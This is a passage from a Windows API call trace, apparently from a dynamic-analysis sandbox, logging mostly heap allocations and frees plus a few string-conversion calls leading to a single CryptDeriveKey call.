hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b78 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c38 | out: hHeap=0x970000) returned 1 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c20 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0134.679] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0134.679] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c68 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c98 | out: hHeap=0x970000) returned 1 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69928 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x24) returned 0x977c98 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a10 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e58 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c68 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ba8 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b30 | out: hHeap=0x970000) returned 1 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50cb0 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0134.680] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54f08 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b90 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54f08 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509f8 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ed8 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.680] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e38 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b18 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d98 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50758 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50770 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506f8 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50920 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50980 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e507a0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50860 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50998 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e506e0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509b0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e509e0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x977908 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69988 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e508c0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ad0 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bd8 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b00 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b60 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50b48 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a40 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78618 | out: hHeap=0x970000) returned 1 [0134.681] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e48 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c50 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a70 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50a88 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50aa0 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ab8 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50ae8 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69b68 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d38 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e558d8 | out: hHeap=0x970000) returned 1 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x2e558d8 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x978490 | out: hHeap=0x970000) returned 1 [0134.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ef8 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a48 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d28 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54d48 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e69a48 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.682] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e18 | out: hHeap=0x970000) returned 1 [0134.682] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x38) returned 0x2e77a48 [0134.682] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e77a48 | out: hHeap=0x970000) returned 1 [0134.683] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d38 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a88 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e78 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x30) returned 0x2e7fe30 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ef8 [0134.683] CharUpperBuffW (in: lpsz="__CRYPT_DLLHANDLE", cchLength=0x11 | out: lpsz="__CRYPT_DLLHANDLE") returned 0x11 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e7fe30 | out: hHeap=0x970000) returned 1 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ef8 | out: hHeap=0x970000) returned 1 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c80 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78a50 [0134.683] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54df8 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54df8 | out: hHeap=0x970000) returned 1 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e78a50 | out: hHeap=0x970000) returned 1 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50c80 | out: hHeap=0x970000) returned 1 [0134.683] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e78 | out: hHeap=0x970000) returned 1 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a28 [0134.683] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dd8 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b30 [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dd8 | out: hHeap=0x970000) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c80 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b90 [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a58 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a70 [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54ec8 | out: hHeap=0x970000) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e50bc0 | out: hHeap=0x970000) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ae8 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d98 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54418 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.813] CharUpperBuffW (in: lpsz="__CRYPT_CONTEXT", cchLength=0xf | out: lpsz="__CRYPT_CONTEXT") returned 0xf [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54418 | out: hHeap=0x970000) returned 1 [0134.813] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54dc8 | out: hHeap=0x970000) returned 1 [0134.813] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xc) returned 0x2e50c50 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78b70 [0134.814] PeekMessageW (in: lpMsg=0x8cef58, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cef58) returned 0 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54da8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54e68 | out: hHeap=0x970000) returned 1 [0134.814] HeapFree (in: hHeap=0x970000, dwFlags=0x0, lpMem=0x2e54da8 | out: hHeap=0x970000) returned 1 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b18 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e48 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b48 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50a40 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b60 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e18 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c98 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x40) returned 0x2e78bb8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ab8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54dc8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50b00 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e88 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50aa0 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509c8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ba8 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d28 [0134.814] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509e0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c38 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d48 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ec8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bc0 [0134.815] CharLowerBuffW (in: lpsz="bool", cchLength=0x4 | out: lpsz="bool") returned 0x4 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e88 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e68 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d98 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54df8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54da8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.815] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x20) returned 0x2e54288 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dc8 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e98 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 15 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0xf) returned 0x2e50bd8 [0134.816] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="CryptDeriveKey", cchWideChar=15, lpMultiByteStr=0x2e50bd8, cbMultiByte=15, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="CryptDeriveKey", lpUsedDefaultChar=0x0) returned 15 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x14) returned 0x2e69b68 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ed8 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.816] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e78 [0134.816] CryptDeriveKey (in: hProv=0xa5f958, Algid=0x6601, hBaseData=0xa86f50, dwFlags=0x1, phKey=0x8cef48 | out: phKey=0x8cef48*=0xa87610) returned 1 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x214) returned 0x978490 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69a08 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d28 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e509f8 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bd8 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54ea8 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ad0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50bf0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50d10 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54d48 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50c50 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e90 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50dd0 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54e18 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50e00 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50ed8 [0134.817] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x10) returned 0x2e50f98 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x4) returned 0x2e54dd8 [0134.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e38 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54eb8 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x18) returned 0x2e69b48 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54ec8 [0134.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e98 [0134.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d68 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54d18 [0134.818] PeekMessageW (in: lpMsg=0x8cf3b8, hWnd=0x0, wMsgFilterMin=0x0, wMsgFilterMax=0x0, wRemoveMsg=0x1 | out: lpMsg=0x8cf3b8) returned 0 [0134.818] RtlAllocateHeap (HeapHandle=0x970000, Flags=0x0, Size=0x8) returned 0x2e54e68 [0134.818] PeekMessageW (in: 